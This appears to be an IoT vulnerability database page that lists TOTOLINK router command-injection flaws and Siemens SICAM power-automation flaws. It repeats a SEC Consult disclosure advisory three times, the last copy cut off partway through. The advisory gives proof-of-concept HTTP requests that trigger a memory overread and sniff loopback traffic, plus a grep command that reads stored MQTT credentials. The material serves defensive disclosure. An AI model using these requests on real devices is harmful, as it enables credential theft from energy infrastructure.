VARIoT IoT vulnerabilities database

TOTOLINK X5000R V9.1.0cu.2350_B20230313 was discovered to contain a command injection vulnerability via the 'port' parameter in the setSSServer function at /cgi-bin/cstecgi.cgi. TOTOLINK of X5000R Firmware contains a command injection vulnerability.Information is obtained, information is tampered with, and service operation is interrupted. (DoS) It may be in a state. TOTOLINK X5000R is a router of China's TOTOLINK Electronics. Attackers can exploit this vulnerability to cause arbitrary command execution

TOTOLINK X5000R V9.1.0cu.2350_B20230313 was discovered to contain an authenticated remote command execution (RCE) vulnerability via the "ipsecL2tpEnable" parameter in the "cstecgi.cgi" binary. TOTOLINK of X5000R A code injection vulnerability exists in the firmware.Information is obtained, information is tampered with, and service operation is interrupted. (DoS) It may be in a state. TOTOLINK X5000R is a router of China's TOTOLINK Electronics. The vulnerability is caused by the ipsecL2tpEnable parameter of cstecgi.cgi failing to properly filter special elements of the constructed code segment. An attacker can exploit this vulnerability to cause arbitrary code execution

TOTOLINK X5000R V9.1.0cu.2350_B20230313 was discovered to contain an authenticated remote command execution (RCE) vulnerability via the "mru" parameter in the "cstecgi.cgi" binary. TOTOLINK of X5000R The firmware has OS A command injection vulnerability exists.Information is obtained, information is tampered with, and service operation is interrupted. (DoS) It may be in a state. TOTOLINK X5000R is a router of China's TOTOLINK Electronics. TOTOLINK X5000R has a code execution vulnerability, which is caused by the parameter mru of cstecgi.cgi failing to properly filter special elements in the constructed code segment. Attackers can exploit this vulnerability to cause arbitrary code execution

TOTOLINK X5000R V9.1.0cu.2350_B20230313 was discovered to contain an authenticated remote command execution (RCE) vulnerability via the "ipsecPsk" parameter in the "cstecgi.cgi" binary. TOTOLINK of X5000R A code injection vulnerability exists in the firmware.Information is obtained, information is tampered with, and service operation is interrupted. (DoS) It may be in a state. TOTOLINK X5000R is a router of China's TOTOLINK Electronics. TOTOLINK X5000R has a code execution vulnerability, which is caused by the ipsecPsk parameter of cstecgi.cgi failing to properly filter special elements of the constructed code segment. Attackers can exploit this vulnerability to cause arbitrary code execution

TOTOLINK X5000R V9.1.0cu.2350_B20230313 was discovered to contain an authenticated remote command execution (RCE) vulnerability via the "mtu" parameters in the "cstecgi.cgi" binary. TOTOLINK of X5000R Firmware contains a command injection vulnerability.Information may be obtained and information may be tampered with. TOTOLINK X5000R is a router of China's TOTOLINK Electronics. The vulnerability is caused by the mtu parameter of cstecgi.cgi failing to properly filter the special elements of the constructed code segment. An attacker can exploit this vulnerability to cause arbitrary code execution

A vulnerability has been identified in OPUPI0 AMQP/MQTT (All versions < V5.30). The affected devices stores MQTT client passwords without sufficient protection on the devices. An attacker with remote shell access or physical access could retrieve the credentials leading to confidentiality loss. SICAM 8 Power automation platform is a universal, all-in-one hardware and software-based solution for all applications in the power supply sector. The SICAM A8000 RTU (Remote Terminal Unit) series is a modular device family for telecontrol and automation applications in all areas of energy supply. SICAM EGS (Enhanced Grid Sensor) is a gateway for local substations in distribution networks. Siemens SICAM products have a sensitive information plaintext storage vulnerability. SEC Consult Vulnerability Lab Security Advisory < 20240626-0 > ======================================================================= title: Multiple Vulnerabilities in Power Automation Products product: Siemens CP-8000/CP-8021/CP8-022/CP-8031/CP-8050/SICORE vulnerable version: CPC80 < V16.41 / CPCI85 < V5.30 / OPUPI0 < V5.30 / SICORE < V1.3.0 / CPCX26 < V06.02 for CP-2016 and PCCX26 < V06.05 for CP-2019 in SICAM AK3 / ETA4 < V10.46 and ETA5 < V03.27 for SM-2558 ins SICAM AK3, SICAM BC and SICAM TM fixed version: CPC80 V16.41 / CPCI85 V5.30 / OPUPI V5.30 / SICORE V1.3.0 / CPCX26 V06.02 / PCCX26 V06.05 / ETA4 V10.46 / ETA5 V03.27 CVE number: CVE-2024-31484, CVE-2024-31485, CVE-2024-31486 impact: high homepage: https://www.siemens.com/global/en/products/energy/energy-automation-and-smart-grid.html found: 2023-04-03 and 2024-01-12 by: Stefan Viehboeck (Office Vienna) Steffen Robertz (Office Vienna) Gerhard Hechenberger (Office Vienna) Constantin Schieber-Knoebl (Office Vienna) SEC Consult Vulnerability Lab An integrated part of SEC Consult, an Eviden business Europe | Asia https://www.sec-consult.com ======================================================================= Vendor description: ------------------- "We are a technology company focused on industry, infrastructure, transport, and healthcare. From more resource-efficient factories, resilient supply chains, and smarter buildings and grids, to cleaner and more comfortable transportation as well as advanced healthcare, we create technology with purpose adding real value for customers." Source: https://new.siemens.com/global/en/company/about.html Business recommendation: ------------------------ The vendor provides a patch which should be installed immediately. SEC Consult highly recommends to perform a thorough security review of the product conducted by security professionals to identify and resolve potential further security issues. Vulnerability overview/description: ----------------------------------- 1) Buffer Overread (Only CP-8000/CP-8021/CP-8022/CP-8031/CP-8050/CPCX26/PCCX26/ETA4/ETA5, CVE-2024-31484) The webserver running on the CP-8050 and CP-8031 is vulnerable to a buffer overread vulnerability. The value of the HTTP header "Session-ID" is processed and used in a "strncpy" call without proper termination. Thus, data structures from the BSS segment will be leaked in the response. Attackers might be able to read sensitive data from memory. 2) Privilege Escalation (Only CP-8031/CP-8050 and SICORE devices, CVE-2024-31485) An attacker with an account with the viewer (or higher) role can intercept unencrypted traffic of other users of the web interface. Thus, the attacker can intercept higher privileged user accounts and passwords and might gain access to their accounts to perform tasks with elevated privileges. 3) Unsafe Storage of MQTT Client Passwords (Only CP-8031/CP-8050, CVE-2024-31486) A PLC with the OPUPI0 MQTT application installed is able to connect to an MQTT server. The configured MQTT password for the server is stored in cleartext on the device and can be read by exploiting a potential code execution or file disclosure vulnerability or with physical access to the device. Proof of concept: ----------------- 1) Buffer Overread (Only CP-8000/CP-8021/CP-8022/CP-8031/CP-8050/CPCX26/PCCX26/ETA4/ETA5, CVE-2024-31484) The buffer overread can be triggered by sending a "Session-ID" in the HTTP request header with exactly 20 bytes. This can be done with e.g. this request: POST /SICAM_TOOLBOX_1703_remote_connection_00.htm HTTP/1.1 User-Agent: SICAM TOOLBOX II Version: 1 Session-ID: 3814280BA9921c6cAAAA Sequence-ID: 1 Content-Length: 8 Content-Type: text/plain KeepAlive: 5 Connection: close type=3 The server answers with following response: HTTP/1.1 200 OK Server: SICAM 1703 Version: 1 Session-ID: 3814280BA9921c6cAAAAæk¤ Cache-Control: max-age=0, private X-Frame-Options: sameorigin Strict-Transport-Security: max-age=31536000; includeSubdomains Content-Security-Policy: default-src 'self' data: blob: 'unsafe-inline' 'unsafe-eval' X-XSS-Protection: 1; mode=block X-Permitted-Cross-Domain-Policies: none Content-Length: 71 Connection: close Date: Wed, 30 Mar 2022 01:38:37 GMT Sequence-ID: 1 Content-Type: text/plain Content-Length: 8 type=4 The Session-ID in the response leaks at least 4 additional bytes. Further, the structure of the response is broken, as some HTTP headers are suddenly part of the body. The vulnerability most likely stems from a misuse of the strncpy function. The following code segment was analyzed (RTUM85.elf, Offset 0x1d50de): ptr_fcgi_header = get_fcgi_param(fcgi_struct, "HTTP_SESSION_ID); if (ptr_fcgi_header == (char*) 0x00) goto LAB_001d4a66; if ( is_a_session_available == 0 ) { strncpy(&session_id, ptr_fcgi_header, 0x14); } strncpy is called with a length parameter of 0x14. To trigger the vulnerability, we are sending exactly 0x14 bytes. Thus, we believe that the global session_id variable is never properly terminated with a Null-pointer. libc's documentation even contains a warning for this case: "If there is no null byte among the first n bytes of src, the string placed in dest will not be null-terminated." Thus, if the response is built, every data structure in BSS following the session_id global will be printed as string until a Null byte is encountered. 2) Privilege Escalation (Only CP-8031/CP-8050 and SICORE devices, CVE-2024-31485) An attacker with an account with the viewer (or higher) role can intercept unencrypted traffic of other users of the web interface. Thus, the attacker can intercept higher privileged user accounts and passwords. By starting the Ethernet Packet Capture (Home -> Monitoring & Simulation -> Ethernet Packet Capture), a request is sent. This request can be modified by an interceptor proxy (e.g. Burp Suite). POST /sicweb-ajax/rtum85/cview HTTP/1.1 Host: HOST User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0 Accept: */* Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/xml SICWEB-SID: xNG1v825qFmCMo8hpjfISlVARKipW1B+lz9d5FoBxipR87VT Content-Length: 198 Origin: http:// HOST Connection: close Referer: http:// HOST/ <?xml version="1.0" encoding="UTF-8"?> <Cmd_SetCustomViewValue><view id="packet_capture"><parameter id="p0"> <value>lo</value> </parameter></view></Cmd_SetCustomViewValue> The attacker can then send the parameter id p0 to the value "lo" and start the packet capture in order to dump from the loopback interface. It is a valid interface, as it only consist of lowercase characters and numbers (fix for CVE-2023-33919). However, the webserver implements TLS in a stunnel fashion. It accepts all TLS traffic on port 443, then decrypts it and forwards it via loopback interface to port 80. By being able to read the loopback traffic, an attacker can now see all communication, including passwords of higher privileged users. 3) Unsafe Storage of MQTT Passwords (Only CP-8031/CP-8050, CVE-2024-31486) To demonstrate the issue, the following parameters were set for the MQTT client using the Siemens Toolbox II: * "8 MQTT password" mqtt_pw_sectest * "9 MQTT username" mqtt_sectest The password (together with the username) can be located in the /ies/data/local/system/iescfg.iar file on the device, which can be retrieved by shell access/code execution on the device or by desoldering and reading its unencrypted flash memory chip: ----------------------------------------------------------------------- grep -rain "mqtt_pw_sectest" /ies/data/local/system/iescfg.iar [...] mqtt mqtt_sectest. mqtt_pw_sectest. < �MQTT_Broker [...] ----------------------------------------------------------------------- Vulnerable / tested versions: ----------------------------- The following version has been tested which was the latest version available at the time of the test: Vulnerability 1 and 2 were confirmed on Siemens SICAM A8000 CP-8031 V05.12 Vulnerability 3 was confirmed on Siemens A8000 CP-8050 V04.92 Vendor contact timeline: ------------------------ 2023-04-18: Contacting vendor through productcert@siemens.com for vulnerability 3 2023-04-19: Advisory will be handled as case #92461. 2023-06-13: Siemens releases advisory for other vulnerabilities, see https://sec-consult.com/vulnerability-lab/advisory/multiple-vulnerabilities-siemens-a8000/ 2023-10-09: Requesting status update 2024-04-03: Requesting status update. 2024-04-04: Unsafe Storage of MQTT password: fix will be released in April 2024, Siemens advisory scheduled for May 2024 2024-04-11: Contacting vendor through productcert@siemens.com for Vulnerability 1 and 2 2024-04-12: Siemens assigned case #68662 for Vulnerability 1,2 2024-05-14: Siemens publishes SSA-871704 for vulnerability 1,2,3 2024-06-11: Siemens publishes SSA-620338 for Vulnerability 1 2024-06-26: Public release of advisory Solution: --------- The vendor provides a patch which can be downloaded at the following URLs depending on the affected device: CPC80 Central Processing/Communication: The firmware CPC80 V16.41 is present within “CP-8000/CP-8021/CP-8022 Package” V16.41 https://support.industry.siemens.com/cs/ww/en/view/109812178/ CPCI85 Central Processing/Communication: The firmware CPCI85 V5.30 is present within "CP-8031/CP-8050 Package" V5.30 https://support.industry.siemens.com/cs/ww/en/view/109804985/ SICORE Base system: The firmware SICORE V1.3.0 is present within "SICAM 8 Software Solution Package" V5.30 https://support.industry.siemens.com/cs/ww/en/view/109818240/ OPUPI0 AMQP/MQTT: The firmware OPUPI0 V5.30 is present within "CP-8031/CP-8050 Package" V5.30 https://support.industry.siemens.com/cs/ww/en/view/109804985/ CPCX26 Central Processing/Communication: The firmware CPCX26 V06.02 is present within “SICAM RTUs AK3 Package” V06.02 https://support.industry.siemens.com/cs/ww/en/view/109813252/ PCCX26 Ax 1703 PE, Contr, Communication Element: The firmware PCCX26 V06.05 is present within “SICAM RTUs AK3 Package” V06.02 https://support.industry.siemens.com/cs/ww/en/view/109813252/ ETA4 Ethernet Interface IEC60870-5-104: The firmware ETA4 V10.46 is present within “SICAM RTUs AK3 Package” V06.02 https://support.industry.siemens.com/cs/ww/en/view/109813252/ ETA5 Ethernet Int. 1x100TX IEC61850 Ed.2: The firmware ETA5 V03.27 is present within “SICAM RTUs AK3 Package” V06.02 https://support.industry.siemens.com/cs/ww/en/view/109813252/ Additional information from the vendor can be found in their advisories: https://cert-portal.siemens.com/productcert/html/ssa-871704.html https://cert-portal.siemens.com/productcert/html/ssa-620338.html Workaround: ----------- Limit network and physical access to the PLC. Advisory URL: ------------- https://sec-consult.com/vulnerability-lab/ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ SEC Consult Vulnerability Lab An integrated part of SEC Consult, an Eviden business Europe | Asia About SEC Consult Vulnerability Lab The SEC Consult Vulnerability Lab is an integrated part of SEC Consult, an Eviden business. It ensures the continued knowledge gain of SEC Consult in the field of network and application security to stay ahead of the attacker. The SEC Consult Vulnerability Lab supports high-quality penetration testing and the evaluation of new offensive and defensive technologies for our customers. Hence our customers obtain the most current information about vulnerabilities and valid recommendation about the risk profile of new technologies. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Interested to work with the experts of SEC Consult? Send us your application https://sec-consult.com/career/ Interested in improving your cyber security with the experts of SEC Consult? Contact our local offices https://sec-consult.com/contact/ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Mail: security-research at sec-consult dot com Web: https://www.sec-consult.com Blog: https://blog.sec-consult.com Twitter: https://twitter.com/sec_consult EOF Stefan Viehboeck, Steffen Robertz, Gerhard Hechenberger, Constantin Schieber-Knoebl / @2024

A vulnerability has been identified in CPCI85 Central Processing/Communication (All versions < V5.30), SICORE Base system (All versions < V1.3.0). The web interface of affected devices is vulnerable to command injection due to missing server side input sanitation. This could allow an authenticated privileged remote attacker to execute arbitrary code with root privileges. SICAM 8 Power automation platform is a universal, all-in-one hardware and software-based solution for all applications in the power supply sector. The SICAM A8000 RTU (Remote Terminal Unit) series is a modular device family for telecontrol and automation applications in all areas of energy supply. SICAM EGS (Enhanced Grid Sensor) is a gateway for local substations in distribution networks. SEC Consult Vulnerability Lab Security Advisory < 20240626-0 > ======================================================================= title: Multiple Vulnerabilities in Power Automation Products product: Siemens CP-8000/CP-8021/CP8-022/CP-8031/CP-8050/SICORE vulnerable version: CPC80 < V16.41 / CPCI85 < V5.30 / OPUPI0 < V5.30 / SICORE < V1.3.0 / CPCX26 < V06.02 for CP-2016 and PCCX26 < V06.05 for CP-2019 in SICAM AK3 / ETA4 < V10.46 and ETA5 < V03.27 for SM-2558 ins SICAM AK3, SICAM BC and SICAM TM fixed version: CPC80 V16.41 / CPCI85 V5.30 / OPUPI V5.30 / SICORE V1.3.0 / CPCX26 V06.02 / PCCX26 V06.05 / ETA4 V10.46 / ETA5 V03.27 CVE number: CVE-2024-31484, CVE-2024-31485, CVE-2024-31486 impact: high homepage: https://www.siemens.com/global/en/products/energy/energy-automation-and-smart-grid.html found: 2023-04-03 and 2024-01-12 by: Stefan Viehboeck (Office Vienna) Steffen Robertz (Office Vienna) Gerhard Hechenberger (Office Vienna) Constantin Schieber-Knoebl (Office Vienna) SEC Consult Vulnerability Lab An integrated part of SEC Consult, an Eviden business Europe | Asia https://www.sec-consult.com ======================================================================= Vendor description: ------------------- "We are a technology company focused on industry, infrastructure, transport, and healthcare. From more resource-efficient factories, resilient supply chains, and smarter buildings and grids, to cleaner and more comfortable transportation as well as advanced healthcare, we create technology with purpose adding real value for customers." Source: https://new.siemens.com/global/en/company/about.html Business recommendation: ------------------------ The vendor provides a patch which should be installed immediately. SEC Consult highly recommends to perform a thorough security review of the product conducted by security professionals to identify and resolve potential further security issues. Vulnerability overview/description: ----------------------------------- 1) Buffer Overread (Only CP-8000/CP-8021/CP-8022/CP-8031/CP-8050/CPCX26/PCCX26/ETA4/ETA5, CVE-2024-31484) The webserver running on the CP-8050 and CP-8031 is vulnerable to a buffer overread vulnerability. The value of the HTTP header "Session-ID" is processed and used in a "strncpy" call without proper termination. Thus, data structures from the BSS segment will be leaked in the response. Attackers might be able to read sensitive data from memory. 2) Privilege Escalation (Only CP-8031/CP-8050 and SICORE devices, CVE-2024-31485) An attacker with an account with the viewer (or higher) role can intercept unencrypted traffic of other users of the web interface. Thus, the attacker can intercept higher privileged user accounts and passwords and might gain access to their accounts to perform tasks with elevated privileges. 3) Unsafe Storage of MQTT Client Passwords (Only CP-8031/CP-8050, CVE-2024-31486) A PLC with the OPUPI0 MQTT application installed is able to connect to an MQTT server. The configured MQTT password for the server is stored in cleartext on the device and can be read by exploiting a potential code execution or file disclosure vulnerability or with physical access to the device. Proof of concept: ----------------- 1) Buffer Overread (Only CP-8000/CP-8021/CP-8022/CP-8031/CP-8050/CPCX26/PCCX26/ETA4/ETA5, CVE-2024-31484) The buffer overread can be triggered by sending a "Session-ID" in the HTTP request header with exactly 20 bytes. This can be done with e.g. this request: POST /SICAM_TOOLBOX_1703_remote_connection_00.htm HTTP/1.1 User-Agent: SICAM TOOLBOX II Version: 1 Session-ID: 3814280BA9921c6cAAAA Sequence-ID: 1 Content-Length: 8 Content-Type: text/plain KeepAlive: 5 Connection: close type=3 The server answers with following response: HTTP/1.1 200 OK Server: SICAM 1703 Version: 1 Session-ID: 3814280BA9921c6cAAAAæk¤ Cache-Control: max-age=0, private X-Frame-Options: sameorigin Strict-Transport-Security: max-age=31536000; includeSubdomains Content-Security-Policy: default-src 'self' data: blob: 'unsafe-inline' 'unsafe-eval' X-XSS-Protection: 1; mode=block X-Permitted-Cross-Domain-Policies: none Content-Length: 71 Connection: close Date: Wed, 30 Mar 2022 01:38:37 GMT Sequence-ID: 1 Content-Type: text/plain Content-Length: 8 type=4 The Session-ID in the response leaks at least 4 additional bytes. Further, the structure of the response is broken, as some HTTP headers are suddenly part of the body. The vulnerability most likely stems from a misuse of the strncpy function. The following code segment was analyzed (RTUM85.elf, Offset 0x1d50de): ptr_fcgi_header = get_fcgi_param(fcgi_struct, "HTTP_SESSION_ID); if (ptr_fcgi_header == (char*) 0x00) goto LAB_001d4a66; if ( is_a_session_available == 0 ) { strncpy(&session_id, ptr_fcgi_header, 0x14); } strncpy is called with a length parameter of 0x14. To trigger the vulnerability, we are sending exactly 0x14 bytes. Thus, we believe that the global session_id variable is never properly terminated with a Null-pointer. libc's documentation even contains a warning for this case: "If there is no null byte among the first n bytes of src, the string placed in dest will not be null-terminated." Thus, if the response is built, every data structure in BSS following the session_id global will be printed as string until a Null byte is encountered. 2) Privilege Escalation (Only CP-8031/CP-8050 and SICORE devices, CVE-2024-31485) An attacker with an account with the viewer (or higher) role can intercept unencrypted traffic of other users of the web interface. Thus, the attacker can intercept higher privileged user accounts and passwords. By starting the Ethernet Packet Capture (Home -> Monitoring & Simulation -> Ethernet Packet Capture), a request is sent. This request can be modified by an interceptor proxy (e.g. Burp Suite). POST /sicweb-ajax/rtum85/cview HTTP/1.1 Host: HOST User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0 Accept: */* Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/xml SICWEB-SID: xNG1v825qFmCMo8hpjfISlVARKipW1B+lz9d5FoBxipR87VT Content-Length: 198 Origin: http:// HOST Connection: close Referer: http:// HOST/ <?xml version="1.0" encoding="UTF-8"?> <Cmd_SetCustomViewValue><view id="packet_capture"><parameter id="p0"> <value>lo</value> </parameter></view></Cmd_SetCustomViewValue> The attacker can then send the parameter id p0 to the value "lo" and start the packet capture in order to dump from the loopback interface. It is a valid interface, as it only consist of lowercase characters and numbers (fix for CVE-2023-33919). However, the webserver implements TLS in a stunnel fashion. It accepts all TLS traffic on port 443, then decrypts it and forwards it via loopback interface to port 80. By being able to read the loopback traffic, an attacker can now see all communication, including passwords of higher privileged users. 3) Unsafe Storage of MQTT Passwords (Only CP-8031/CP-8050, CVE-2024-31486) To demonstrate the issue, the following parameters were set for the MQTT client using the Siemens Toolbox II: * "8 MQTT password" mqtt_pw_sectest * "9 MQTT username" mqtt_sectest The password (together with the username) can be located in the /ies/data/local/system/iescfg.iar file on the device, which can be retrieved by shell access/code execution on the device or by desoldering and reading its unencrypted flash memory chip: ----------------------------------------------------------------------- grep -rain "mqtt_pw_sectest" /ies/data/local/system/iescfg.iar [...] mqtt mqtt_sectest. mqtt_pw_sectest. < �MQTT_Broker [...] ----------------------------------------------------------------------- Vulnerable / tested versions: ----------------------------- The following version has been tested which was the latest version available at the time of the test: Vulnerability 1 and 2 were confirmed on Siemens SICAM A8000 CP-8031 V05.12 Vulnerability 3 was confirmed on Siemens A8000 CP-8050 V04.92 Vendor contact timeline: ------------------------ 2023-04-18: Contacting vendor through productcert@siemens.com for vulnerability 3 2023-04-19: Advisory will be handled as case #92461. 2023-06-13: Siemens releases advisory for other vulnerabilities, see https://sec-consult.com/vulnerability-lab/advisory/multiple-vulnerabilities-siemens-a8000/ 2023-10-09: Requesting status update 2024-04-03: Requesting status update. 2024-04-04: Unsafe Storage of MQTT password: fix will be released in April 2024, Siemens advisory scheduled for May 2024 2024-04-11: Contacting vendor through productcert@siemens.com for Vulnerability 1 and 2 2024-04-12: Siemens assigned case #68662 for Vulnerability 1,2 2024-05-14: Siemens publishes SSA-871704 for vulnerability 1,2,3 2024-06-11: Siemens publishes SSA-620338 for Vulnerability 1 2024-06-26: Public release of advisory Solution: --------- The vendor provides a patch which can be downloaded at the following URLs depending on the affected device: CPC80 Central Processing/Communication: The firmware CPC80 V16.41 is present within “CP-8000/CP-8021/CP-8022 Package” V16.41 https://support.industry.siemens.com/cs/ww/en/view/109812178/ CPCI85 Central Processing/Communication: The firmware CPCI85 V5.30 is present within "CP-8031/CP-8050 Package" V5.30 https://support.industry.siemens.com/cs/ww/en/view/109804985/ SICORE Base system: The firmware SICORE V1.3.0 is present within "SICAM 8 Software Solution Package" V5.30 https://support.industry.siemens.com/cs/ww/en/view/109818240/ OPUPI0 AMQP/MQTT: The firmware OPUPI0 V5.30 is present within "CP-8031/CP-8050 Package" V5.30 https://support.industry.siemens.com/cs/ww/en/view/109804985/ CPCX26 Central Processing/Communication: The firmware CPCX26 V06.02 is present within “SICAM RTUs AK3 Package” V06.02 https://support.industry.siemens.com/cs/ww/en/view/109813252/ PCCX26 Ax 1703 PE, Contr, Communication Element: The firmware PCCX26 V06.05 is present within “SICAM RTUs AK3 Package” V06.02 https://support.industry.siemens.com/cs/ww/en/view/109813252/ ETA4 Ethernet Interface IEC60870-5-104: The firmware ETA4 V10.46 is present within “SICAM RTUs AK3 Package” V06.02 https://support.industry.siemens.com/cs/ww/en/view/109813252/ ETA5 Ethernet Int. 1x100TX IEC61850 Ed.2: The firmware ETA5 V03.27 is present within “SICAM RTUs AK3 Package” V06.02 https://support.industry.siemens.com/cs/ww/en/view/109813252/ Additional information from the vendor can be found in their advisories: https://cert-portal.siemens.com/productcert/html/ssa-871704.html https://cert-portal.siemens.com/productcert/html/ssa-620338.html Workaround: ----------- Limit network and physical access to the PLC. Advisory URL: ------------- https://sec-consult.com/vulnerability-lab/ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ SEC Consult Vulnerability Lab An integrated part of SEC Consult, an Eviden business Europe | Asia About SEC Consult Vulnerability Lab The SEC Consult Vulnerability Lab is an integrated part of SEC Consult, an Eviden business. It ensures the continued knowledge gain of SEC Consult in the field of network and application security to stay ahead of the attacker. The SEC Consult Vulnerability Lab supports high-quality penetration testing and the evaluation of new offensive and defensive technologies for our customers. Hence our customers obtain the most current information about vulnerabilities and valid recommendation about the risk profile of new technologies. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Interested to work with the experts of SEC Consult? Send us your application https://sec-consult.com/career/ Interested in improving your cyber security with the experts of SEC Consult? Contact our local offices https://sec-consult.com/contact/ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Mail: security-research at sec-consult dot com Web: https://www.sec-consult.com Blog: https://blog.sec-consult.com Twitter: https://twitter.com/sec_consult EOF Stefan Viehboeck, Steffen Robertz, Gerhard Hechenberger, Constantin Schieber-Knoebl / @2024

A vulnerability has been identified in CPC80 Central Processing/Communication (All versions < V16.41), CPCI85 Central Processing/Communication (All versions < V5.30), CPCX26 Central Processing/Communication (All versions < V06.02), ETA4 Ethernet Interface IEC60870-5-104 (All versions < V10.46), ETA5 Ethernet Int. 1x100TX IEC61850 Ed.2 (All versions < V03.27), PCCX26 Ax 1703 PE, Contr, Communication Element (All versions < V06.05). The affected devices contain an improper null termination vulnerability while parsing a specific HTTP header. This could allow an attacker to execute code in the context of the current process or lead to denial of service condition. SICAM 8 Power automation platform is a universal, all-in-one hardware and software-based solution for all applications in the field of power supply. The SICAM A8000 RTU (Remote Terminal Unit) series is a modular device family for telecontrol and automation applications in all areas of energy supply. SICAM EGS (Enhanced Grid Sensor) is a gateway for local substations in distribution networks. SEC Consult Vulnerability Lab Security Advisory < 20240626-0 > ======================================================================= title: Multiple Vulnerabilities in Power Automation Products product: Siemens CP-8000/CP-8021/CP8-022/CP-8031/CP-8050/SICORE vulnerable version: CPC80 < V16.41 / CPCI85 < V5.30 / OPUPI0 < V5.30 / SICORE < V1.3.0 / CPCX26 < V06.02 for CP-2016 and PCCX26 < V06.05 for CP-2019 in SICAM AK3 / ETA4 < V10.46 and ETA5 < V03.27 for SM-2558 ins SICAM AK3, SICAM BC and SICAM TM fixed version: CPC80 V16.41 / CPCI85 V5.30 / OPUPI V5.30 / SICORE V1.3.0 / CPCX26 V06.02 / PCCX26 V06.05 / ETA4 V10.46 / ETA5 V03.27 CVE number: CVE-2024-31484, CVE-2024-31485, CVE-2024-31486 impact: high homepage: https://www.siemens.com/global/en/products/energy/energy-automation-and-smart-grid.html found: 2023-04-03 and 2024-01-12 by: Stefan Viehboeck (Office Vienna) Steffen Robertz (Office Vienna) Gerhard Hechenberger (Office Vienna) Constantin Schieber-Knoebl (Office Vienna) SEC Consult Vulnerability Lab An integrated part of SEC Consult, an Eviden business Europe | Asia https://www.sec-consult.com ======================================================================= Vendor description: ------------------- "We are a technology company focused on industry, infrastructure, transport, and healthcare. From more resource-efficient factories, resilient supply chains, and smarter buildings and grids, to cleaner and more comfortable transportation as well as advanced healthcare, we create technology with purpose adding real value for customers." Source: https://new.siemens.com/global/en/company/about.html Business recommendation: ------------------------ The vendor provides a patch which should be installed immediately. SEC Consult highly recommends to perform a thorough security review of the product conducted by security professionals to identify and resolve potential further security issues. Vulnerability overview/description: ----------------------------------- 1) Buffer Overread (Only CP-8000/CP-8021/CP-8022/CP-8031/CP-8050/CPCX26/PCCX26/ETA4/ETA5, CVE-2024-31484) The webserver running on the CP-8050 and CP-8031 is vulnerable to a buffer overread vulnerability. The value of the HTTP header "Session-ID" is processed and used in a "strncpy" call without proper termination. Thus, data structures from the BSS segment will be leaked in the response. Attackers might be able to read sensitive data from memory. 2) Privilege Escalation (Only CP-8031/CP-8050 and SICORE devices, CVE-2024-31485) An attacker with an account with the viewer (or higher) role can intercept unencrypted traffic of other users of the web interface. Thus, the attacker can intercept higher privileged user accounts and passwords and might gain access to their accounts to perform tasks with elevated privileges. 3) Unsafe Storage of MQTT Client Passwords (Only CP-8031/CP-8050, CVE-2024-31486) A PLC with the OPUPI0 MQTT application installed is able to connect to an MQTT server. The configured MQTT password for the server is stored in cleartext on the device and can be read by exploiting a potential code execution or file disclosure vulnerability or with physical access to the device. Proof of concept: ----------------- 1) Buffer Overread (Only CP-8000/CP-8021/CP-8022/CP-8031/CP-8050/CPCX26/PCCX26/ETA4/ETA5, CVE-2024-31484) The buffer overread can be triggered by sending a "Session-ID" in the HTTP request header with exactly 20 bytes. This can be done with e.g. this request: POST /SICAM_TOOLBOX_1703_remote_connection_00.htm HTTP/1.1 User-Agent: SICAM TOOLBOX II Version: 1 Session-ID: 3814280BA9921c6cAAAA Sequence-ID: 1 Content-Length: 8 Content-Type: text/plain KeepAlive: 5 Connection: close type=3 The server answers with following response: HTTP/1.1 200 OK Server: SICAM 1703 Version: 1 Session-ID: 3814280BA9921c6cAAAAæk¤ Cache-Control: max-age=0, private X-Frame-Options: sameorigin Strict-Transport-Security: max-age=31536000; includeSubdomains Content-Security-Policy: default-src 'self' data: blob: 'unsafe-inline' 'unsafe-eval' X-XSS-Protection: 1; mode=block X-Permitted-Cross-Domain-Policies: none Content-Length: 71 Connection: close Date: Wed, 30 Mar 2022 01:38:37 GMT Sequence-ID: 1 Content-Type: text/plain Content-Length: 8 type=4 The Session-ID in the response leaks at least 4 additional bytes. Further, the structure of the response is broken, as some HTTP headers are suddenly part of the body. The vulnerability most likely stems from a misuse of the strncpy function. The following code segment was analyzed (RTUM85.elf, Offset 0x1d50de): ptr_fcgi_header = get_fcgi_param(fcgi_struct, "HTTP_SESSION_ID); if (ptr_fcgi_header == (char*) 0x00) goto LAB_001d4a66; if ( is_a_session_available == 0 ) { strncpy(&session_id, ptr_fcgi_header, 0x14); } strncpy is called with a length parameter of 0x14. To trigger the vulnerability, we are sending exactly 0x14 bytes. Thus, we believe that the global session_id variable is never properly terminated with a Null-pointer. libc's documentation even contains a warning for this case: "If there is no null byte among the first n bytes of src, the string placed in dest will not be null-terminated." Thus, if the response is built, every data structure in BSS following the session_id global will be printed as string until a Null byte is encountered. 2) Privilege Escalation (Only CP-8031/CP-8050 and SICORE devices, CVE-2024-31485) An attacker with an account with the viewer (or higher) role can intercept unencrypted traffic of other users of the web interface. Thus, the attacker can intercept higher privileged user accounts and passwords. By starting the Ethernet Packet Capture (Home -> Monitoring & Simulation -> Ethernet Packet Capture), a request is sent. This request can be modified by an interceptor proxy (e.g. Burp Suite). POST /sicweb-ajax/rtum85/cview HTTP/1.1 Host: HOST User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0 Accept: */* Accept-Language: 